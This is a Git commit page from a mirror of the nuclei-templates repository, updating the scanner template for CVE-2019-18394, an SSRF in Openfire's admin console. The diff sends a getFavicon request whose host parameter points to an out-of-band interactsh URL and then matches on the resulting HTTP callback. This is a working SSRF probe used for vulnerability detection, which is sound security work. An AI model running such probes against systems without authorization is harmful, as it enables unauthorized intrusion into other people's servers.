daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #2091 from projectdiscovery/CVE-2019-18394-update 

Updated payload + matcher
patch-1
Sandeep Singh 2021-07-19 18:14:39 +05:30 committed by GitHub
parent 5833092a53 2d6198ba04
commit 8f2edecdd4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
cves/2019/CVE-2019-18394.yaml
View File

@ -8,13 +8,15 @@ info:
refrense: |
- https://swarm.ptsecurity.com/openfire-admin-console/
- https://github.com/igniterealtime/Openfire/pull/1497
tags: cve,cve2019,ssrf
tags: cve,cve2019,ssrf,openfire,oob
requests:
- method: GET
path:
- "{{BaseURL}}/getFavicon?host=burpcollaborator.net"
- "{{BaseURL}}/getFavicon?host=http://{{interactsh-url}}"
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- <h1>Burp Collaborator Server</h1>
- "http"